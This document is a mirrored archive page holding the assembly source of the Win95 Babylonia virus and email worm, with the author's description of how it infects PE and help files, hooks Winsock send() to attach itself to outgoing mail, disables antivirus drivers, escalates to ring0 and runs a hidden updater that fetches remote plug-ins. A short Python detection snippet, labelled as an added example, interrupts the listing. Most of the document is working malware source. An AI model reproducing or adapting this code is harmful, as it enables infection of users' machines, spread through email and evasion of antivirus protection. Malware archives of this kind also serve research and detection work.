mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
vxug-MalwareSourceCode/LegacyWindows/Win95.Babylonia.11036.asm
2020-10-09 21:54:36 -05:00


──────────────────────────────────────────────────────────────[BABYLON.ASM]───
comment ^
W95/Babylonia.11036 - Set babylonia on fire!
(c) Vecna 1999
I am of the opinion that asm speaks for itself to the worthwhile reader, so I
will be brief...

This virus is a memory-resident ring0/ring3 virus, infecting PE EXE files,
HLP files, and WSOCK32.DLL. The virus uses EPO features, but no encryption or
poly at all, although it can be updated via WWW. ;)

For a long time, people were thinking about an upgradeable virus. Some attempts
were made, such as W95/SK, which was able to run specially prepared data in RAR
files. But how far can the upgrade RAR packet go? In this virus, I show my
implementation of a plugin format, with the modules (plug-ins) online at a
WWW page.

The virus is also an advanced email worm, attaching itself to all outgoing
e-mails (not sending a new one as Happy99 does), can deal with attachments
already in the e-mail body, has BASE64 and uu-encode routines, and, more
important, the icon of the infected dropper sent by email changes with the
current date.

When an infected app (or dropper) is executed, the virus doesn't get control at
that moment. The virus patches a JMP or CALL, and waits to be called. When this
happens, the virus loads some APIs from the KERNEL32.DLL memory image (using
CRC32), then jumps to ring0 using a callgate. The infamous DESCRIPTOR 0 is used
to store the temporary data, breaking the pmode taboo ;)

While in ring0, the virus allocs some memory, installs a hook in the IFS
handler, and waits for access to PE EXE files, HLP files, and WSOCK32.DLL. The
memory is also scanned for the presence of SPIDER.VXD (DrWeb) and AVP.VXD
(Z0MBiE's lib). If they're found, their code is patched in a way that they lose
the ability to open files. After returning control to the host, if the virus
has just installed itself memory resident, it drops the www updater to disk and
spawns it. More about the www updater below.

PE files, when accessed, are infected by having the virus appended to the last
section, or with that section overwritten if it was relocs, and with the CODE
sections scanned for a suitable place for a CALL VIRUS. HLP files have a script
added that passes control immediately to the virus code by using the callback
features of the USER32 API EnumWindows().

When WSOCK32.DLL is accessed, the send() export is redirected to a chunk of
code on top of the relocation info. This code gets a ring0 memory pointer to
the new send() handler through functionality newly added to the
GetFileAttributes() API ;)

The code in the new send() scans the outgoing data for e-mail info, and adds an
infected dropper at the end of it. The virus supports both MIME and non-MIME
email clients, and can add the dropper in both uu-encoded and BASE64 format.
The icon of this dropper changes together with the name, to reflect some dates.

All data carried with the virus is compressed using the aPLib v0.22b library. I
replaced my old LZW scheme with these routines due to the immense gain in speed,
compressed size, and code size. It is the same algorithm I used in Fabi.9608.

When the www updater is executed, it registers itself, with the fake name of
KERNEL32.EXE, in the registry, to run always, and copies itself to the /winsys
directory to avoid easy detection. The updater hides itself from the
CTRL+ALT+DEL task list, and stays in the background waiting for the user to
connect to the internet.

Always in the background, without any user notice, the www updater then
connects to my www page and downloads the virus plug-ins (which have a special
format, and can be expanded, to have full compatibility with future versions).
If these modules comply with the version and features required to run, they are
executed. The power of this is obvious. By adding new plugins, I can make the
virus an irc-worm, infect remote drives, or even a poly engine. The problem of
the possible takedown of my URL is bypassed with the smart use of forwarders
(not implemented in the public source version of the updater).

The first module online is the greetz to the people that helped me with this
virus, be it with betatesting, be it with ideas, be it with moral support.
Currently I am working on new modules, with new ideas that I think will be
worth coding.

If you aren't a d0rk, you can contact me at vecna_br@hotmail.com, but idiot
questions about how to compile and the like will be ignored... and your soul
can be lost in the attempt to contact me ;)

Questions about where the entrypoint is will be ignored too... ;>
^
.586p
.model flat
locals
ofs equ offset
by equ byte ptr
wo equ word ptr
dwo equ dword ptr
fwo equ fword ptr
TRUE EQU 1
FALSE EQU 0
include host.inc
_VIRUS segment dword use32 public 'KMARAI'
vcode equ this byte
DEBUG equ FALSE ;debug version?
DROPPER_SIZE equ 6144
ENTRY_READ equ 128
SKIP_FIRST equ 16
CRLF equ <13,10>
CRC_POLY equ 0EDB88320h
CRC_INIT equ 0FFFFFFFFh
crc macro string ;jp/lapse macro
.radix 16d
crcReg = CRC_INIT
irpc _x, <string>
ctrlByte = '&_x&' xor (crcReg and 0ff)
crcReg = crcReg shr 8
rept 8
ctrlByte = (ctrlByte shr 1) xor (CRC_POLY * (ctrlByte and 1))
endm
crcReg = crcReg xor ctrlByte
endm
dd crcReg
.radix 10d
endm
_gdt struc
limit dw ?
base dd ?
_gdt ends
_descriptor struc
limit_l dw ?
base_l dw ?
base_m db ?
access db ?
limit_h db ?
base_h db ?
_descriptor ends
_jmpfar struc
jmpofs32 dd ?
selectr dw ?
_jmpfar ends
_callback struc
offset_l dw ?
selector dw ?
attrib dw ?
offset_h dw ?
_callback ends
wsize2 equ 260
hook proc
db 0e9h
i_jmp dd 0 ;HLP redirector
hlp_start = ofs virusmain-$
enter 20h, 0 ;setup stack frame
push ecx
push ebx
mov ebx, [ebp+0Ch]
cmp bl, 33 ;hookz ifs_attr
je @@jmpcc
cmp bl, 36 ;hookz ifs_open
je @@jmpcc
cmp bl, 37 ;hookz ifs_ren
@@jmpcc:
jmpcc equ by $
jne @@noopen ;beware! near form of jnz
mov ebx, ebp
pusha
call delta
mov wo [ebp+(ofs jmpcc-ofs vcode)], 0e990h
add esp, -wsize2
mov edi, esp
mov eax, [ebx+10h]
inc al
jz @@nodrive
sub ax, -(":@"-1)
stosw
@@nodrive:
push 0 ;BCS_WANSI
push 255
mov eax, [ebx+1ch]
mov eax, [eax+0ch]
inc eax
inc eax
inc eax
inc eax
push eax
push edi
push 400041h ;VxDCall UniToBCSPath
call vxd
add esp, 16
dec edi ;edi=start of name
dec edi
lea esi, [edi+eax-2]
mov eax, [esi]
not eax
cmp eax, not '---.'
jne @@no_special
cmp wo [esi-10], '_\'
jne @@no_special ;trying to access the backdoor?
cmp dwo [ebx+0ch], 33 ;file attr?
jne @@no_special
mov wo [ebp+(ofs backdoor-ofs vcode)], 9090h ;wsock32.dll is calling us
@@no_special:
IF DEBUG EQ TRUE
cmp [esi-4], 'TAOG'
jne @@shit
ENDIF
xor eax, not 'EXE.' ;esi=extension
jnz @@try_hlp
doshdr equ 0
peptr equ 3ch
pehdr equ doshdr+40h
cbfr equ pehdr+0f8h
sectn equ cbfr+100h
fsize equ sectn+200h
epraw equ fsize+4
vrva equ epraw+4
lolimit equ vrva+4
uplimit equ lolimit+4
wsize4 equ uplimit+4
add esp, -wsize4 ;infect PE EXE files...
mov esi, edi
call open
jc @@err
call getsize
mov [esp+fsize], eax
cmp eax, DROPPER_SIZE ;my babies get better treatment
je @@dropper
call check_size
jz @@err1
@@dropper:
mov esi, esp
push 40h
pop ecx
sub edx, edx
call read ;read 40h of header
xor eax, ecx
jnz @@err1
movzx eax, wo [esi]
not eax
sub eax, not 'ZM' ;make sure is a EXE
jnz @@err1
cmp wo [esi+18h], 40h
jb @@err1
add cl, 0f8h-40h
sub esi, -peptr
lodsd
xchg eax, edx
call read
jc @@err1
call check_file ;already infected?
jz @@err1
movzx eax, wo [esi+22]
test eax, 0102h
jz @@err1
test eax, 3000h ;executable/no dll
jnz @@err1
movzx ecx, wo [esi+6]
cmp cl, 3
jb @@err1 ;too few sections
push 0f8h
imul ecx, ecx, 40
pop edx
add edx, [esp+peptr]
lea esi, [esp+sectn]
call read ;read section table
sub edi, edi
xchg edi, ecx
mov eax, [esp+pehdr+40]
sub eax, [esi+12]
cmp eax, [esi+8] ;entrypoint in first section?
ja @@err1
add eax, [esi+20] ;raw ofs of entrycode
mov [esp+epraw], eax
mov eax, [esi+36]
bts eax, 31 ;make 1st sec +write
jc @@err1 ;and exit if already is
bt eax, 5
jnc @@err1 ;need be CODE
test eax, 10000000h+80h+40h
jnz @@err1 ;cant be SHARED or UDATA/DATA
mov [esi+36], eax
mov eax, [esi+12]
mov [esp+lolimit], eax
add eax, [esi+8]
mov [esp+uplimit], eax ;boundaries of .code section
mov ebx, -(ofs vend-ofs vcode)
sub ecx, ebx
mov eax, [esp+pehdr+160]
sub eax, [esi+edi-40+12]
jnz @@increase ;last section isnt relocs
mov eax, [esi+edi-40+16]
add eax, ebx
jnb @@increase ;relocs too small
sub eax, eax
mov edx, eax
add eax, [esi+edi-40+12] ;rva of start of our code
mov [esp+vrva], eax
add edx, [esi+edi-40+20]
jmp @@write
@@increase:
mov eax, [esi+edi-40+8]
mov edx, eax
add eax, [esi+edi-40+12]
add edx, [esi+edi-40+20]
mov [esp+vrva], eax ;rva of start of our code
sub [esi+edi-40+8], ebx
mov eax, [esi+edi-40+16]
sub eax, ebx ;increase last section
mov ebx, [esp+pehdr+60]
dec ebx
add eax, ebx
not ebx
and eax, ebx ;align raw section size
mov [esi+edi-40+16], eax
@@write:
mov dwo [esi+edi-40+36], 0c0000040h
sub dwo [esp+vrva], -(ofs virusmain-ofs vcode)
add esi, edi
add esi, (-40+8)
lodsd
xchg ebx, eax
lodsd
add ebx, eax ;rva+size
mov eax, [esp+pehdr+56]
dec eax
add ebx, eax
not eax
and ebx, eax ;align it
mov [esp+pehdr+80], ebx ;update imagesize
mov esi, ebp
pusha
mov edx, [esp+epraw+((8*4))]
push ENTRY_READ
lea esi, [esp+cbfr+(8*4)+4]
pop ecx
call read ;read entrycode
pusha
push SKIP_FIRST
pop eax
add esi, eax ;skip first bytes(antiAV)
sub ecx, eax
@@jmp_call:
lodsb
cmp al, 0e8h ;call
je @@found
cmp al, 0e9h ;jmp
je @@found
@@loop1:
loop @@jmp_call
mov edi, [esp+(1*4)] ;put CALL at start
push 5
pop esi
jmp @@calculate
@@found:
mov edi, esi
lodsd ;displacement
mov edx, esi
sub esi, [esp+(1*4)] ;turn to distance
add eax, esi
add eax, [esp+pehdr+40+(16*4)] ;add entrypoint(our base)
cmp eax, [esp+lolimit+(16*4)]
jb @@out
cmp eax, [esp+uplimit+(16*4)] ;valid call?
jb @@fine
@@out:
sub ecx, 4
mov esi, edx
jmp @@loop1
@@fine:
dec edi
@@calculate:
push esi
mov esi, edi
lodsb
not eax
mov by [ebp+(ofs instr1-ofs vcode)], al ;save modificated code
lodsd
not eax
mov [ebp+(ofs instr2-ofs vcode)], eax
pop ecx
add ecx, [esp+pehdr+40+(16*4)] ;add entrypoint
mov al, 0e8h
stosb
mov eax, [esp+vrva+(16*4)] ;our rva
sub eax, ecx
stosd ;build call to it
popa
call write ;write entrycode
popa
call write ;write virus body
sub edx, edx
push 0f8h
lea esi, [esp+peptr+4]
lodsd
pop ecx
xchg edx, eax
bts wo [esi+22], 0
mov [esi+160], eax ;strip relocs
mov [esi+164], eax
call write ;write old header
add edx, eax
movzx ecx, wo [esi+6]
imul ecx, ecx, 40
sub esi, -(sectn-pehdr)
call write ;write section table
@@err1:
call close
@@err:
add esp, wsize4
@@try_hlp:
xor eax, not 'PLH.' xor not 'EXE.'
jnz @@wsockdll
buffer equ 0 ;stack frame
old_ofs equ 4
old_sz equ 8
patch1 equ 12
wsize3 equ 16
mainhdr equ 0 ;buffer structure
pagedir equ 10h
syshdr equ 210h
build equ 225h
add esp, -wsize3 ;infect HLP files...
mov esi, edi
call open
jc @@error000
push 32*1024
push 040000dh ;getheap
call vxd
pop ecx
mov [esp+buffer], eax
mov esi, eax ;esi=buffer.mainhdr
push 10h
pop ecx
sub edx, edx
call read ;read 10h of header
jc @@free
lodsd
xor eax, 035f3fh ;hlp signature?
jnz @@free
lodsd
lea edx, [eax+37h] ;edx=directory offset
mov ecx, 200h
lodsd
lodsd ;esi=buffer.pagedir
call read
mov ecx, eax
@@search:
dec ecx
jz @@free
cmp dwo [esi+ecx], 'SYS|'
jnz @@search
cmp dwo [esi+ecx+4], 'MET'
jnz @@search
mov eax, [esi-4] ;eax=end of file
xchg eax, [esi+ecx+8] ;section code = end of file
xchg eax, edx
push 15h
push 15h
sub esi, -(syshdr-pagedir)
pop ecx
call read ;read sys hdr
mov ecx, [esi]
pop eax
sub ecx, eax
add edx, eax
mov [esp+old_ofs], edx
mov [esp+old_sz], ecx ;save old code position/size
mov edi, [esp.buffer]
sub edi, -build
lea esi, [ebp+(ofs hlp1_s-ofs vcode)]
lea eax, [edi+(ofs _size-ofs hlp1_s)]
mov [esp.patch1], eax
push hlp1_sz
pop ecx
@@decr:
lodsb ;copy start macro
not al
stosb
loop @@decr
push edi ;edi=buffer
mov dwo [ebp+(ofs i_jmp-ofs vcode)], hlp_start
lea esi, [ebp+(ofs vend-ofs vcode)]
@@next:
add esi, -4
mov eax, [esi]
call check
test edx, edx ;can make it directly?
jnz @@ext
mov al, 12h ;push ?
org $-1
push 12345678h
org $-4
stosb
mov eax, [esi]
stosd
jmp @@done_
@@ext:
mov al, 0b8h ;mov eax, ?
stosb
mov eax, [esi]
xor eax, edx
stosd
mov al, 35h ;xor eax, ?
stosb
mov eax, edx
stosd
mov al, 50h ;push eax
stosb
@@done_:
cmp esi, ebp
jne @@next
pop eax
mov ecx, edi
sub ecx, eax ;ecx=poly code
sub eax, eax
mov dwo [esi+(ofs i_jmp-ofs vcode)], eax
push ecx
add ecx, (ofs hlp1_e-ofs p1)+(ofs hlp2_e-ofs hlp1_e)
mov eax, [esp.patch1+4]
mov wo [eax], cx ;patch macro size
sub esi, -(ofs hlp1_e-ofs vcode)
push hlp2_sz
pop ecx
rep movsb ;copy end macro
pop eax
mov esi, [esp.buffer]
sub esi, -syshdr
add eax, hlp2_e-hlp1_s
add [esi], eax
add [esi+4], eax ;fix syshdr size
mov esi, edi
mov edx, [esp.old_ofs]
mov ecx, [esp.old_sz]
sub eax, ecx ;old script too large?
jbe @@free
call read ;read old code
cmp [esi+4], "`(RR"
je @@free ;probably already infected
mov ebp, [esp.buffer] ;ebp=buffer
lea ecx, [edi+eax]
sub ecx, ebp ;ecx=our size
add ecx, -syshdr
mov edx, [ebp.mainhdr+12]
lea esi, [ebp.syshdr]
call write ;write our code
mov esi, [esp.buffer]
push 10h
add [esi.mainhdr+12], eax
sub edx, edx
pop ecx
call write ;write main header
mov edx, [esi.mainhdr+4]
sub edx, -37h
mov ecx, 200h
add esi, pagedir
call write ;write directory
@@free:
push dwo [esp+buffer]
push 040000eh ;freeheap
call vxd
pop eax
call close ;close file
@@error000:
add esp, wsize3
@@wsockdll:
; xor eax, not 'EXE.' xor not 'PLH.' xor not 'LLD.'
xor eax, 01c000c00h
jnz @@shit
IF DEBUG EQ FALSE
mov eax, [esi-4]
mov esi, [esi-8]
not eax
xchg eax, esi
not eax
cmp esi, not '23KC'
jne @@shit
cmp eax, not 'OSW\'
jne @@shit
ENDIF
obufer equ 0 ;stack frame
header equ obufer+3ch
pe_hdr equ header+4
section equ pe_hdr+0f8h
export equ section+200h
vofs equ export+4
vraw equ vofs+4
etable equ vraw+4
wsize1 equ etable+(4*20)
add esp, -wsize1 ;patch WSOCK32.DLL...
mov esi, edi
call open
jc @@error0
call getsize
mov edi, eax
call check_size
jz @@error1
sub edx, edx
mov ecx, 40h
lea esi, [esp+obufer]
call read
cmp wo [esp+obufer], 'ZM'
jne @@error1
push 0f8h
pop ecx
mov edx, [esp+header]
cmp edx, edi
jae @@error1 ;point outside of the file?
lea esi, [esp+pe_hdr]
call read
jc @@error1
call check_file
jz @@error1
call write ;write pe header
add edx, eax
movzx ecx, wo [esi+6]
push ecx
imul ecx, ecx, 40
lea esi, [esp+section+4]
call read ;read section table
pop ecx
@@writeable:
bts dwo [esi+36], 31 ;make all sections writeable
sub esi, -40
loop @@writeable
mov [esi-40+36], 0c0000040h
mov ecx, [esi-40+8] ;increase last section
push ecx
add ecx, [esi-40+20]
mov [esp+vraw+4], ecx ;raw of our patch
pop ecx
add ecx, [esi-40+12]
mov [esp+vofs], ecx ;rva of our patch
add dwo [esi-40+8], (ofs pend-ofs pstart)
mov ebx, [esi-40+8]
cmp ebx, [esi-40+16]
jbe @@fit
mov ecx, [esp+pe_hdr+60]
dec ecx
add ebx, ecx
not ecx
and ebx, ecx
mov [esi-40+16], ebx ;align
@@fit:
xchg eax, ecx
lea esi, [esp+section]
call write
mov eax, [esp+pe_hdr+120] ;eax=export table
call rva2raw
xchg eax, edx
push 4
pop ecx
sub edx, -28
lea esi, [esp+export]
call read ;read export table addresses
mov eax, [esi]
call rva2raw
xchg eax, edx
push (4*20)
pop ecx
lea esi, [esp+etable] ;read 20 exports
call read
mov eax, [esp+vofs]
mov edi, [esp+pe_hdr+52] ;wsock32 base
sub eax, -(ofs send-ofs pstart)
xchg [esi+(4*18)], eax ;hook send
add edi, eax
mov [ebp+(ofs oldsend-ofs vcode)], edi
mov [ebp+(ofs _send-ofs vcode)], edi
call write
mov edx, [esp+vraw]
push (ofs pend-ofs pstart)
pop ecx
call delta
sub ebp, -(ofs pstart-ofs vcode)
xchg esi, ebp
call write ;write our patch
@@error1:
call close
@@error0:
add esp, wsize1
@@shit:
add esp, wsize2 ;release tmp buffer
mov wo [ebp+(ofs jmpcc-ofs vcode)], 0850fh
popa
@@noopen:
push 6
push 1Ch
pop ebx
pop ecx ;total=6 paramz
@@nparam:
mov eax, [ebp+ebx] ;copy paramz from old frame
push eax ;to new frame
add ebx, -4
loop @@nparam
db 0b8h ;mov eax, ?
oldhook dd 0
call [eax] ;call old hookz
add esp, 6*4
backdoor equ $
jmp @@closed
call @@delta
@@delta:
pop ecx
add ecx, (ofs my_send-ofs @@delta)
mov wo [ecx-(ofs my_send-ofs backdoor)], ((ofs @@closed-(ofs backdoor+2))*100h)+0ebh
mov ebx, [ebp+1ch] ;ioreq
push esi
mov esi, [ebx+14h]
lodsd ;c:\_
sub eax, eax
mov ebx, eax
@@byte:
lodsb ;get filename char
inc ah
sub al, 'A'
or bl, al ;build address
cmp ah, 8
je @@doneb
shl ebx, 4
jmp @@byte
@@doneb:
mov [ebx], ecx ;patch requested address
pop esi
@@closed:
pop ebx
pop ecx
leave
ret
hook endp
delta proc
call @@delta
@@delta:
pop ebp
add ebp, -(ofs @@delta-ofs vcode)
ret
delta endp
check_file proc
mov eax, [esi]
not eax
cmp eax, not 'EP'
jne @@error
cmp wo [esi+4], 14ch ;386
jb @@error
cmp wo [esi+4], 14eh ;586
ja @@error
xor eax, edx ;(not('PE')xor(pe_ofs)xor(entry))
bswap eax
xor eax, [esi+40]
cmp [esi+8], eax ;infected?
mov [esi+8], eax
db 066h, 0b8h ;mov ax, ?
@@error:
sub eax, eax
ret
check_file endp
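
Added example, not part of the original listing: a Python triage check for the marker that check_file above writes into the PE TimeDateStamp field (header offset 8), computed from the PE header offset and AddressOfEntryPoint, which the infection routine leaves unchanged. The function names and the sample header bytes are constructed for illustration; a match is a 32-bit heuristic, not proof of infection.

```python
import struct

PE_SIG = 0x00004550  # bytes 'P','E',0,0 read as a little-endian dword


def bswap32(value: int) -> int:
    """Reverse the byte order of a 32-bit value (the x86 BSWAP instruction)."""
    return int.from_bytes(value.to_bytes(4, "little"), "big")


def expected_marker(e_lfanew: int, entry_rva: int) -> int:
    """Value check_file compares against TimeDateStamp:
    bswap(not('PE') xor pe_ofs) xor entrypoint, all in 32 bits."""
    return bswap32((~PE_SIG ^ e_lfanew) & 0xFFFFFFFF) ^ entry_rva


def has_marker(data: bytes):
    """Return True if TimeDateStamp equals the marker, False if it does not,
    and None when the bytes are not a PE image that check_file would accept."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 44 > len(data):  # need the header through AddressOfEntryPoint
        return None
    sig, machine = struct.unpack_from("<IH", data, e_lfanew)
    # check_file only accepts machine types 14Ch..14Eh
    if sig != PE_SIG or not 0x14C <= machine <= 0x14E:
        return None
    (timestamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    (entry_rva,) = struct.unpack_from("<I", data, e_lfanew + 40)
    return timestamp == expected_marker(e_lfanew, entry_rva)


def build_header(e_lfanew: int, entry_rva: int, timestamp: int) -> bytes:
    """Constructed sample: a DOS stub plus a 0xF8-byte PE header holding only
    the fields the check reads. It is not a loadable executable."""
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    pe = bytearray(0xF8)
    struct.pack_into("<IH", pe, 0, PE_SIG, 0x14C)
    struct.pack_into("<I", pe, 8, timestamp)
    struct.pack_into("<I", pe, 40, entry_rva)
    return bytes(dos + pe)


if __name__ == "__main__":
    marked = build_header(0x80, 0x1000, expected_marker(0x80, 0x1000))
    clean = build_header(0x80, 0x1000, 0x37D5A000)  # arbitrary constructed timestamp
    print("marked header:", has_marker(marked))
    print("clean header: ", has_marker(clean))
```
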
gdt equ 0
idt equ 6
ring0_cs equ 12
ring0_ds equ 16
jmpfar equ 20
wsize equ 26
kernel32 equ 0bff70000h
virusmain proc
pushf
pusha
add esp, -wsize
cld
sub eax, eax
call @@seh
mov esp, [esp+8] ;hmm... SEH... :/
jmp @@installed
@@seh:
push dwo fs:[eax]
mov fs:[eax], esp
mov esi, [kernel32+80h+120] ;get kernel32 APIs...
mov esi, [esi]
sub esi, -(kernel32+24) ;esi=export directory+24
lodsd
push eax
lodsd
push eax
lodsd
xchg ebx, eax
pop ebp ;ebp=RVA table
pop ecx ;ecx=number of names
lodsd
xchg esi, eax ;esi=names table
xchg esi, ebx ;ebx=ordinal table
mov edx, -kernel32
sub esi, edx
sub ebp, edx
sub ebx, edx ;edx=-kernel32
sub edi, edi
@@loopy:
inc edi ;edi=ordinal counter
lodsd ;eax=API name string
pusha
sub eax, edx
xchg eax, esi
push CRC_INIT ;calculate crc of string
pop ecx
@@next_byte:
lodsb
test al, al
jz @@done
xor cl, al
mov al, 8
@@next_bit:
shr ecx, 1
jnc @@poly
xor ecx, CRC_POLY
@@poly:
dec al
jnz @@next_bit
jmp @@next_byte
@@done:
call @@delta1
@@delta1:
pop esi
add esi, (ofs _openfile-ofs @@delta1)
cmp ecx, 12345678h ;crcz of API
org $-4
crc <CreateFileA>
je @@patch_api
sub esi, -((ofs _getfattr-ofs vcode)-(ofs _openfile-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <GetFileAttributesA>
je @@patch_api
sub esi, -((ofs _writefile-ofs vcode)-(ofs _getfattr-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <WriteFile>
je @@patch_api
add esi, ((ofs _closehandle-ofs vcode)-(ofs _writefile-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <CloseHandle>
je @@patch_api
sub esi, -((ofs _seekfile-ofs vcode)-(ofs _closehandle-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <SetFilePointer>
je @@patch_api
add esi, (ofs _loadl-ofs vcode)-(ofs _seekfile-ofs vcode)
cmp ecx, 12345678h
org $-4
crc <LoadLibraryA>
je @@patch_api
add esi, (ofs _freel-ofs vcode)-(ofs _loadl-ofs vcode)
cmp ecx, 12345678h
org $-4
crc <FreeLibrary>
je @@patch_api
sub esi, -((ofs _getproc-ofs vcode)-(ofs _freel-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <GetProcAddress>
je @@patch_api
add esi, (ofs _gsystime-ofs vcode)-(ofs _getproc-ofs vcode)
cmp ecx, 12345678h
org $-4
crc <GetSystemTime>
je @@patch_api
sub esi, -((ofs _fdelete-ofs vcode)-(ofs _gsystime-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <DeleteFileA>
je @@patch_api
add esi, (ofs _readfile-ofs vcode)-(ofs _fdelete-ofs vcode)
cmp ecx, 12345678h
org $-4
crc <ReadFile>
je @@patch_api
add esi, (ofs _getmhandle-ofs vcode)-(ofs _readfile-ofs vcode)
cmp ecx, 12345678h
org $-4
crc <GetModuleHandleA>
je @@patch_api
sub esi, -((ofs _winexec-ofs vcode)-(ofs _getmhandle-ofs vcode))
cmp ecx, 12345678h
org $-4
crc <WinExec>
jne @@end_loopy
@@patch_api:
movzx eax, wo [ebx+(edi*2)] ;get ordinal
dec eax
mov eax, [ebp+(eax*4)] ;get rva
sub eax, edx
mov [esi], eax ;got it!
@@end_loopy:
popa
dec ecx
jnz @@loopy ;all APIs scanned
call delta
lea eax, [ebp+(ofs wsock-ofs vcode)]
push eax
db 0b8h
_loadl dd 0
call eax ;load wsock32.dll
xchg eax, ecx
jecxz @@suxx
push ecx ;for FreeLibrary
call @@send
db 'send', 0
@@send:
push ecx
db 0b8h+7 ;GetProcAddress
_getproc dd 0
call edi
cmp by [eax], 0e8h ;the difference between masters
jne @@isnt ;and pupils ;)
cmp by [eax+5], 0b8h
jne @@isnt
mov eax, [eax+6] ;get real addy :)
@@isnt:
mov [ebp+(ofs oldsend-ofs vcode)], eax
db 0b8h
_freel dd 0
call eax
@@suxx:
push 8
push ebp
pop esi
push (ofs vend-ofs vcode)/4 ;make sure we're commited
pop ecx
rep lodsd
pop eax
lea edi, [ebp+(ofs myname-ofs vcode)]
xchg eax, ecx
rep stosd
mov ebp, esp ;jmp2ring0...
push 1
sgdt [ebp+gdt] ;get global descriptor table
sidt [ebp+idt] ;get interrupt table
mov esi, [ebp+gdt.base]
mov edi, esi
movzx ecx, wo [ebp+gdt.limit]
pop ebx
@@search_gdt:
sub eax, eax
cmp wo [esi.limit_l], 0ffffh
jne @@next_descriptor
cmp by [esi.limit_h], 0cfh ;descriptor start at 0?
jne @@next_descriptor
cmp wo [esi.base_l], ax ;and cover the whole range?
jne @@next_descriptor
cmp by [esi.base_m], al
jne @@next_descriptor
cmp by [esi.base_h], al
jne @@next_descriptor ;is a flat descriptor!
cmp [esi.access], 9bh
jne @@no_code ;is a code descriptor?
mov eax, esi
sub eax, [ebp+gdt.base]
mov [ebp+ring0_cs], eax ;yes, save it!
shl ebx, 1
jmp @@next_descriptor
@@no_code:
cmp [esi.access], 93h
jne @@next_descriptor ;is a data descriptor?
mov eax, esi
sub eax, [ebp+gdt.base]
mov [ebp+ring0_ds], eax ;yes, save it!
shl ebx, 1
@@next_descriptor:
lodsd
lodsd
bt ebx, 2 ;our 2 descriptors found?
jc @@search_done
loop @@search_gdt
jmp @@installed ;flat descriptors dont found
@@search_done:
mov esi, edi ;esi=1st entry
lodsd ;edi=nul entry
lodsd
test eax, eax ;nul entry isnt empty?
jnz @@installed ;then already resident
pusha
movsd
movsd ;backup 1st descriptor
popa
mov eax, dwo [ebp+ring0_cs]
mov wo [esi.selector], ax ;ring0 code selector
mov wo [esi.attrib], 0ec00h
call @@over_ring0_code ;[esp]=ring0 code
@@ring0_code:
mov ds, ax
mov es, ax ;setup data access
xchg esi, edi
movsd ;restore 1st descriptor
movsd
mov edi, ebp
mov ebx, [edi.gdt.base]
movzx ecx, wo [edi.gdt.limit]
call protect ;make gdt read only
mov ebx, [edi.idt.base]
movzx ecx, wo [edi.idt.limit]
call protect ;make idt read only
push 00270005h
call vxd ;VXDLDR GetDeviceList
@@next:
mov ebx, [eax+5] ;VxD_Desc_Block *DI_DDB
sub ebx, 0C0000000h
jc @@next_vxd
lea ecx, [ebx+0C000000Ch] ;Name_0
cmp [ecx], 'DIPS' ;'SPIDER '
je @@patch
cmp [ecx], '9PVA' ;'AVP95 '
jne @@next_vxd
@@patch:
push 0000D500h ;R0_OPENCREATFILE
pop esi
call ScanVxd
inc esi ;R0_OPENCREAT_IN_CONTEXT
call ScanVxd
@@next_vxd:
mov eax, [eax]
or eax, eax
jnz @@next
push 9
push eax
push eax
push eax
push eax
push eax
push 1
push 64/4 ;memory for email shitz
push 010053h
call vxd
add esp, 8*4
test eax, eax
jz @@fucked
mov [ebp+(ofs mem_temp-ofs vcode)], eax
@@fucked:
push (ofs vend-ofs vcode)
push 9
push eax
push eax
push eax
push eax
push eax
push 1
push (((ofs vend-ofs vcode)+4095)/4096)
push 010053h ;PageAlloc
call vxd
add esp, 8*4
test eax, eax
jz @@fuck
mov edi, eax
xchg eax, ecx
xchg ecx, [esp] ;pop size/push &hook
push ebp
pop esi
rep movsb
mov [edi+(ofs i_jmp-ofs vcode)-(ofs vend-ofs vcode)], ecx
mov [edi+(ofs socket_out-ofs vcode)-(ofs vend-ofs vcode)], ecx
mov wo [edi+(ofs jmpcc-ofs vcode)-(ofs vend-ofs vcode)], 0850fh
push 00400067h ;install ifs hook
call vxd
mov [edi+(ofs oldhook-ofs vcode)-(ofs vend-ofs vcode)], eax
@@fuck:
pop eax
retf
@@over_ring0_code:
pop eax
mov ebx, eax
shr eax, 16
mov wo [esi.offset_l], bx ;address of routine
mov wo [esi.offset_h], ax
push 0
pop dwo [ebp+jmpfar.jmpofs32]
mov wo [ebp+jmpfar.selectr], 8 ;jmp to callback 1
mov eax, dwo [ebp+ring0_ds] ;set ring0 data
push ds
push es
cli
call fwo [ebp+jmpfar] ;call our ring0 code
cli
pop es
pop ds
@@installed:
sub eax, eax
pop dwo fs:[eax] ;remove SEH
pop ecx
call delta
mov eax, [ebp+(ofs mem_temp-ofs vcode)]
test eax, eax
jz @@no_ready
push eax
call @@over
include updater.inc
@@over:
call _aP_depack_asm ;unpack updater data
push eax
push 2
pop ecx
lea esi, [ebp+(ofs dropname-ofs vcode)]
call r3_open
pop ecx
jz @@no_ready
mov esi, [ebp+(ofs mem_temp-ofs vcode)]
call r3_write
call r3_close
push 0
lea eax, [ebp+(ofs dropname-ofs vcode)]
push eax
db 0b8h
_winexec dd 0
call eax
@@no_ready:
cmp dwo [ebp+(ofs i_jmp-ofs vcode)], 0
je @@pe_exe
add esp, wsize
popa
popf
add esp, (ofs vend-ofs vcode)
sub eax, eax ;stop enumeration
ret 8 ;return to callback
@@pe_exe:
lea eax, [esp+wsize+(9*4)]
mov edi, [eax]
sub edi, 5 ;return place
mov [eax], edi
mov al, not 0b8h
instr1 equ by $-1
not eax
stosb
mov eax, 12345678h
instr2 equ dwo $-4
not eax
stosd
add esp, wsize
popa
popf
ret ;return to same place!
virusmain endp
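
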